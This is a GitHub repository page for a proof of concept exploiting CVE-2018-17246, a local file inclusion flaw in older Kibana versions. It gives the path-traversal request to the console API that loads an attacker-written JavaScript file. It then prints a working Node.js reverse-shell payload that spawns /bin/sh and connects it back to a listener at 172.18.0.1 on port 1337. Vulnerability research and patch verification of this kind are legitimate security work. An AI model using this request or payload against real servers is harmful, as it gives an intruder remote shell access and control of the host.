Skip to content
master
Switch branches/tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

A Local File Inclusion on Kibana found by CyberArk Labs, the LFI can be use to execute a reverse shell on the Kibana server with the following payload:

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

As you already guessed, this attack need to be paired with an unrestricted file upload or any other vulnerability that allows you to write a file on the server.

There is no input validation so we can change the name of the JavaScript file to anything we want. In this case, with the path traversal technique, we can choose any file on the Kibana server. One thing to be aware of, however, is node's module caching feature. Essentially, since the LFI works by sending unsanitized user input to node's require function, the included module (the attacker's payload) will be cached by filename. This means that you cannot send the same payload to, e.g., recover a reverse shell.

lfi

Vulnerability details: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Security Advisory: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

About

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published